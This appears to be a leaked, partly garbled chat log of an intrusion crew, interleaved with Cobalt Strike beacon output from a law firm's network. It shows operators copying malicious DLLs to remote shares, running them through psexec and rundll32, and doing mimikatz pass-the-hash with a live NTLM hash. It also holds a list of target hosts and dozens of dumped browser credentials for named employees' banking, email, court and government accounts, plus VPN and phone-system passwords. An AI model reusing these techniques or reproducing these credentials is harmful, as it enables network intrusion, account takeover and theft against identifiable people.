What is this and where does it come from? Search for cloud storage access further in the browserswhich software accesses these cloudsand then find out what it is and understand what it is
NAS/network hardware or what see what admin is hanging out there and blow on the 80/443 ports
to figure out what's up with the host already i'm thinking how the hell it was!!!!!!!!!```
it's on d
```
ls \hostname\d$

gives an output or what?
I do not know how to comment on the attempt to copy inaccessible dira
what to do in this case is obvious in my opinion, sorry it's all open ports3389 can be checked
in hell you can check what axis is still open? if the drive C does not exist - there can only be one fucking obvious assumption) it's not even an error to correct you somewhere you try to copy the file to a non-existent dira I do not know what to add you are so verbose ...
(ICMP) Target '192.168.100.97' is alive. [read 8 bytes]

[+] received output:
192.168.100.97:443

[+] received output:
192.168.100.97:80
192.168.100.97:22 (SSH-2.0-dropbear_2014.63)
``Scan to everything''.
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$
[*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$
[+] host called home, sent: 70 bytes
[+] received output:
The network path was not found.

``22shell dir \\desktop-33jh80d.sprouselaw.com\c$already tried445 which ports can be scanned?
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com
[*] Tasked beacon to run: net view \desktop-33jh80d.sprouselaw.com
[+] host called home, sent: 72 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

```
same kind of ballyhoo then so yeah.
Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97
```
that's his host, the one you threw in is DK
\zion.sprouselaw.com
``but try the hostname``
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\\192.168.100.97
[*] Tasked beacon to run: net view \\192.168.100.97
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1
[*] tasked beacon to run: ping 192.168.100.97 -n 1
[+] host called home, sent: 55 bytes
[+] received output:

Pinging 192.168.100.97 with 32 bytes of data:
Reply from 192.168.100.97: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.100.97:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97
[*] Tasked beacon to run: nslookup 192.168.100.97
[+] host called home, sent: 54 bytes
[+] received output:
Server: zion.sprouselaw.com
Address: 192.168.100.240

Name: desktop-33jh80d.sprouselaw.com
Address: 192.168.100.97

```
I don't know what to do, there is no view on the host/ipnu scan to the win ports How can you check this? I'm not sure of anything in life so how do you copy to a folder you can't see? are you sure it's a win machine? @user8 from any machine as long as the machine sees all domain controllers
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\\192.168.100.97\C$\
[*] Tasked beacon to list files in \\192.168.100.97\C$\
[+] host called home, sent: 37 bytes
[-] could not open \192.168.100.97\C$\*: 53
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData
[*] Tasked beacon to list files in \192.168.100.97\C$\ProgramData
[+] host called home, sent: 49 bytes
[-] could not open \192.168.100.97\C$\ProgramData\*: 53
Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \192.168.100.97\C$\ProgramData@tl2
```
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\\192.168.100.97\C$\ProgramData\
[*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\
[+] host called home, sent: 95 bytes
[+] received output:
The network path was not found.
        0 file(s) copied.

``@user7 for what reason? What failed?
192.168.100.238
```
+
I connected and it just froze, then I couldn't get the dll on it
192.168.100.97 -
192.168.100.98 -
192.168.100.99 -
192.168.100.94 -
192.168.100.95 -
```
couldn't get on these machineshttp://habr.com/ru/post/434514/`Mitel/192.168.100.235twd/jyhu\judy sprouse350```Mitel/192.168.100.235twd/ccolumbus\christinec changeme````
How to use VPN

1. Double-click the VPN icon on the Desktop

Skip (2. Double-click 38.68.2.51)

Enter username JeffH (case sensitive)

4. Enter password Sprouse20!

5. click OK

---------------

6. When finished, right-click 38.68.2.51 > click Disable

7. Close the VPN window.
````Mitel/192.168.100.235twd/tirion\terry Terry1`Mitel/192.168.100.235/cmogonye\courtney changeme` on DA computer installed PasswordsPlus`Mitel/192.168.100.235/redwards\reva sss3500rbe````
URL : https://www.heb.com/myaccount/login.jsp
Username : susan.hillyer@sprouselaw.com
Password : shSprouse2019

--- Chromium Credential (User: susanh) ---
URL : https://www.tbls.org/
Username : 17408600
Password : barons26

--- Chromium Credential (User: susanh) ---
URL : https://web1.zixmail.net/s/setup
Username : susan.hillyer@sprouselaw.com
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://www.adr.org/aaa/faces/register
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://apps.adr.org/AAAApp/faces/login.jsf
Username : SprouseVictoria
Password : Sprouse2020

--- Chromium Credential (User: susanh) ---
URL : https://ep4.ingeo.com/Login.aspx
Username : sprouselaw34
Password : Sprouse2020sh

````Mitel/192.168.100.235twd/shillyer\susanh Sprouse2016SH````
--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL :
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL :
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL :
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL :
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL :
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL :
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL :
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL :
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL :
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/web/en-US/apps/sso/Login.aspx
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL :
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL :
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/cruise-finder/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : https://signin.lexisnexis.com/lnaccess/Transition
Username : barons26
Password : fffF666^

--- Chromium Credential (User: bill) ---
URL : https://www.earthpoint.us/SignIn.aspx
Username : jbrrussell@suddenlink.net
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://sso.accounts.dowjones.com/login
Username : barons26
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.united.com/en/us
Username : DT435172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL : https://www.oceaniacruises.com/login/
Username : bill.russell@sprouselaw.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349281159
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.att.com/my/
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL : https://www.delta.com/
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL : https://www.aopa.org/login/Default/index.cfm
Username : barons26
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://secure.classmates.com/auth/login
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://outlook.sprouselaw.com/owa/auth.owa
Username : bill
Password : Sprouse2013BR

--- Chromium Credential (User: bill) ---
URL : https://www.tbls.org/MyTBLS/Login.aspx
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL : https://www.avis.com/en/
Username : B3M205
Password : Iw$500fa

--- Chromium Credential (User: bill) ---
URL : https://www.veteransadvantage.com/vauser3/auth2/process
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://www.nutrisystem.com/jsp/myaccount/login/login.jsp
Username : jbrrussell@suddenlink.net
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/
Username : barons26a
Password : usafa1978

--- Chromium Credential (User: bill) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : BILL.RUSSELL@SPROUSELAW.COM
Password : 20202020

--- Chromium Credential (User: bill) ---
URL      : https://enroll.schwab.com/AoUI/
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL      : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL      : https://legacy.enterprise.com/car_rental/enterprisePlusLoginWidget.do
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : https://www.dropbox.com/ajax_login
Username : bill.russell@sprouselaw.com
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : https://ec.consumerreports.org/ec/cro/sem/login.htm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL      : https://login.optumbank.com/CAP/Portlets/login.jsf
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br202020$

--- Chromium Credential (User: bill) ---
URL      : https://flightaware.com/account/session
Username : russell@suddenlinkmail.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL      : https://www.texasbar.com/AM/Template.cfm
Username : 17408600
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : https://www.paygonline.com/websc/logon.html
Username : 5129451807
Password : Barons26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.hertz.com/rentacar/reservation/
Username : 16493982
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.enterprise.com/en/home.html
Username : RJ6STJ4
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : https://www.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL      : https://www.facebook.com/login/device-based/regular/login/
Username : jbrrussell@suddenlink.net
Password : Iw$2020ffb

--- Chromium Credential (User: bill) ---
URL      : https://lms.schwab.com/Login
Username : Mallarae
Password : Henry1776

--- Chromium Credential (User: bill) ---
URL      : https://www.celebritycruises.com/
Username : jbrrussell
Password : br202020

--- Chromium Credential (User: bill) ---
URL      : https://chaseonline.chase.com/Logon.aspx
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL      : https://www.delta.com/custlogin/login.action
Username : 9350391968
Password : Iw$500fd

--- Chromium Credential (User: bill) ---
URL      : https://www.united.com/en/us
Username : *****172
Password : Iw$500fual

--- Chromium Credential (User: bill) ---
URL      : https://onlinebanking.bankofoklahoma.com/Login/SubmitLogin
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.amazon.com/ap/signin
Username : barons26@yahoo.com
Password : 202020

--- Chromium Credential (User: bill) ---
URL      : https://us1.proofpointessentials.com/app/login.php
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL      : https://www.celebritycruises.com/account/signin
Username : jbrrussell@suddenlink.net
Password : barons26

--- Chromium Credential (User: bill) ---
URL      : https://www.ups.com/lasso/login
Username : jbrrussell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://onlinebanking.bankofoklahoma.com/login/loginsubmit
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://web1.zixmail.net/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://app.mt.gov/epass-idp/Authn/EpassCreate/
Username : mallarae
Password : 32mallarae

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL      : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://securemail.americanmomentum.bank/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26@gmail.com
Password : dtjyqh32

--- Chromium Credential (User: bill) ---
URL      : https://mobile.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : 45583567
Password : Iw2019fmpe

--- Chromium Credential (User: bill) ---
URL      : https://accounts.google.com/signin/v2/challenge/password/empty
Username : russell@suddenlinkmail.com
Password : iw$500fg

--- Chromium Credential (User: bill) ---
URL      : https://healthsafeid.optumbank.com/
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.trade-a-plane.com/user-signup/create_account
Username : barons26
Password : 20202020

--- Chromium Credential (User: bill) ---
URL      : https://www.insurancelawsection.org/documents/state-farm-lloyds-v-fuentes-2/
Username : bill.russell@sprouselaw.com
Password : SKk)COlOBuWf

--- Chromium Credential (User: bill) ---
URL      : https://www.sandhillslogin.com/account/Signin
Username : bill.russell@sprouselaw.com
Password : Iw$500fc

--- Chromium Credential (User: bill) ---
URL      : javascript:;
Username : bluemini
Password : Iw$2020fh

--- Chromium Credential (User: bill) ---
URL      : https://login.celebrations.com/login
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.fedex.com/apps/fdmenrollment/
Username : barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : ba****26
Password : iw$520fmp

--- Chromium Credential (User: bill) ---
URL      : 
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://securemail.zionsbancorp.com/securereader/registration.jsf
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://secure.consumerreports.org/ec/inputNewPasswordForm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL      : https://www.ancestry.com/checkout/MLI
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL      : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL      : https://securemail.simmonsfirst.com/securereader/registration.jsf
Username : bill
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : javascript:void(0);
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : javascript:;
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://app.farmlogs.com/
Username : 3615789943
Password : 20202020

--- Chromium Credential (User: bill) ---
URL      : https://secure.ssa.gov/RIL/Si.action
Username : JBRRUSSELL
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br202020$

--- Chromium Credential (User: bill) ---
URL      : https://auth.veteransadvantage.com/signinform
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL      : https://flightaware.com/account/manage
Username : bill.russell@sprouselaw.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL      : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : barons26@gmail.com
Password : mallarae32

--- Chromium Credential (User: bill) ---
URL      : https://www.wyndhamhotels.com/wyndham-rewards/first-time-sign-in
Username : barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL      : https://login.fidelity.com/ftgw/Fas/Fidelity/NBPart/CreateUsernamePwd/Create/dj.chf.ra
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL      : https://nb.fidelity.com/ftgw/Fas/Fidelity/PWI/Login/Response/dj.chf.ra/
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL      : https://www.eftps.gov/eftps/taiLoginAttempt
Username : 2732058
Password : Tri2020$202020

--- Chromium Credential (User: bill) ---
URL      : https://www.alltrails.com/signup
Username : bill.russell@sprouselaw.com
Password : 20202020

````Mitel/192.168.100.235/brussell\SPROUSELAW\bill changeme`@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak+Does it start without comma?
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\\192.168.100.103\C$\ProgramData\
Look for notes from this username@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/
but it won't unlock the chrome credentials.
tried with dpapi:chrome and sharpchrome
prints out empty passwords.
--- Chromium Credential (User: douglas) ---
URL      : https://tx.countygovernmentrecords.com/texas/web/loginPOST.jsp;jsessionid=3AF15044DA2A27D57AED078F8544455B
Username : douglas.brooking@sprouselaw.com
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL      : https://www.texasfile.com/login/
Username : taylor.kelley@sprouselaw.com
Password : Gorebels1856

--- Chromium Credential (User: douglas) ---
URL      : https://direct.sos.state.tx.us/acct/acct-login.asp
Username : 10245062
Password : sprouse2017

--- Chromium Credential (User: douglas) ---
URL      : https://unitedhealthcaremotion.com/Home/LoginPartial
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://www.myuhc.com/member/prewelcome.do
Username : 
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://us1.proofpointessentials.com/app/login.php
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://pacer.login.uscourts.gov/csologin/login.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL      : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://www.sos.ok.gov/client/cLoginRegistration.aspx
Username : brooking
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL      : https://pcl.uscourts.gov/pcl/index.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL      : http://www.oilgas.org/EmailPassword.aspx
Username : DBrooking05
Password : 24110605

--- Chromium Credential (User: douglas) ---
URL      : https://my.voya.com/voyasso/index.html
Username : brookingd
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://www.aa.com/loyalty/login/submit
Username : 83JC1X6
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://www.delta.com/
Username : 9478151385
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://www.united.com/ual/en/us/account/account/login
Username : LW762392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://www.united.com/ual/en/us/account/account/login
Username : *****392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://www.aeroplan.com/log_in.do
Username : 750173031
Password : Anastasia0623

--- Chromium Credential (User: douglas) ---
URL      : https://www.southwest.com/air/booking/index.html
Username : 629692276
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : javascript:;
Username : Brooking
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://ondemand-relcs-02.fronteo.com/Relativity/Identity/login
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 660371613
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : 
Username : 1159185041
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://idp.elliemae.com/as/oopXr/resume/as/authorization.ping
Username : dbrooking1020
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://scrcxp.pdhi.com/Portal/Member/4cb6782c-b48d-451e-96be-02d2a7b314a3
Username : dbrooking806
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL      : https://accounts.myuhc.com/rt/login/myuhc/en
Username : 
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL      : https://texasstateparks.reserveamerica.com/memberSignInSignUp.do
Username : douglas.brooking@sprouselaw.com
Password : Geordi9392!

--- Chromium Credential (User: douglas) ---
URL      : https://www.hilton.com/en/auth/login/
Username : 938312336
Password : Natwwal1214!

````Mitel/192.168.100.235/dbrooking\douglas Stasia9323``Mitel/192.168.100.235/msadler\matts Sprouse350``Mitel/192.168.100.235twd/msadler\matts Sprouse350`обратите отдельное внимание на возможные бекап системы```
--- Chromium Credential (User: matts) ---
URL      : https://www.att.com/my/
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL      : https://cprodmasx.att.com/commonLogin/igate_wam/multiLogin.do
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL      : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : matt.sadler@sprouselaw.com
Password : kalley01
``` 
`matts-pc [192.168.100.93]````
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \\.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \\.\pipe\4fee59
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  11124
  |  TID  8532
  |  LSA Process is now R/W
  |  LUID 0 ; 1696015470 (00000000:6517246e)
  \_ msv1_0   - data copy @ 00000275420FFA80 : OK !
  \_ kerberos - data copy @ 000002754222D6C8
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218E768 (32) -> null

beacon> shell copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
[*] Tasked beacon to run: copy x64.dll \\192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.

````pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58````
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \\.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : aandaservice
domain  : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  9896
  |  TID  936
  |  LSA Process is now R/W
  |  LUID 0 ; 1695752222 (00000000:6513201e)
  \_ msv1_0   - data copy @ 0000027541E22080 : OK !
  \_ kerberos - data copy @ 0000027541F15C08
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000002754218FAE8 (32) -> null
``````
user    : aandaservice
domain  : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM    : 1737a8ca4966a1b4cf767232b0a4bd58
  |  PID  19196
  |  TID  15936
  |  LSA Process is now R/W
  |  LUID 0 ; 575605488 (00000000:224f0af0)
  \_ msv1_0   - data copy @ 000001FD13FD6080 : OK !
  \_ kerberos - data copy @ 000001FD13E24C88
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001FD13F107E8 (32) -> null
``````
pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
``` 
```
The referenced account is currently locked out and may not be logged on to.

``pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c 19 through 37 lines
с 192.168.100.227
to 192.168.100.89https://ru.malwarebytes.com/business/endpoint-protection/``
192.168.100.100
192.168.100.102
192.168.100.103
192.168.100.105
192.168.100.106
192.168.100.107
192.168.100.108
192.168.100.110
192.168.100.111
192.168.100.114
192.168.100.117
192.168.100.118
192.168.100.120
192.168.100.130
192.168.100.134
192.168.100.135
192.168.100.136
192.168.100.138
192.168.100.139
192.168.100.140
192.168.100.142
192.168.100.143
192.168.100.144
192.168.100.145
192.168.100.147
192.168.100.148
192.168.100.150
192.168.100.152
192.168.100.153
192.168.100.154
192.168.100.155
192.168.100.156
192.168.100.158
192.168.100.160
192.168.100.162
192.168.100.164
192.168.100.165
192.168.100.167
192.168.100.168
192.168.100.170
192.168.100.171
192.168.100.172
192.168.100.175
192.168.100.176
192.168.100.182
192.168.100.187
192.168.100.189
192.168.100.196
192.168.100.198
192.168.100.207
192.168.100.218
192.168.100.222
192.168.100.224
192.168.100.226
192.168.100.227
192.168.100.228
192.168.100.229
192.168.100.230
192.168.100.231
192.168.100.232
192.168.100.233
192.168.100.234
192.168.100.235
192.168.100.236
192.168.100.237
192.168.100.238
192.168.100.243
192.168.100.245
192.168.100.246
192.168.100.247
192.168.100.248
192.168.100.89
192.168.100.93
192.168.100.94
192.168.100.95
192.168.100.96
192.168.100.97
192.168.100.98
192.168.100.99
192.168.111.120
192.168.111.134
192.168.111.135
192.168.111.138
192.168.112.117
